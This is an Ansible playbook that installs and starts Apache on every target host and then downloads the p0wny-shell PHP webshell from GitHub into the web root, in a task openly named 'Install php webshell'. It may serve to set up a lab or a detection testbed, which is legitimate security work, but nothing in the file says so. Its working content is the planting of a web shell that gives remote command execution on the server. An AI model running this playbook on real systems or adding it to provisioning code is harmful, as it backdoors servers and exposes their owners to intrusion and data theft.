---
- name: Provision VM with apache and webshell
  become: true  # If you need to run tasks with elevated privileges, such as sudo
  hosts: all
  gather_facts: true

  tasks:
    - name: Install apache
      ansible.builtin.apt:
        update_cache: true
        name: apache2
        state: present
    - name: Start apache service
      ansible.builtin.service:
        name: apache2
        state: started
    - name: Install php webshell
      ansible.builtin.get_url:
        url: https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
        dest: "/var/www/html/"
        mode: '0644'
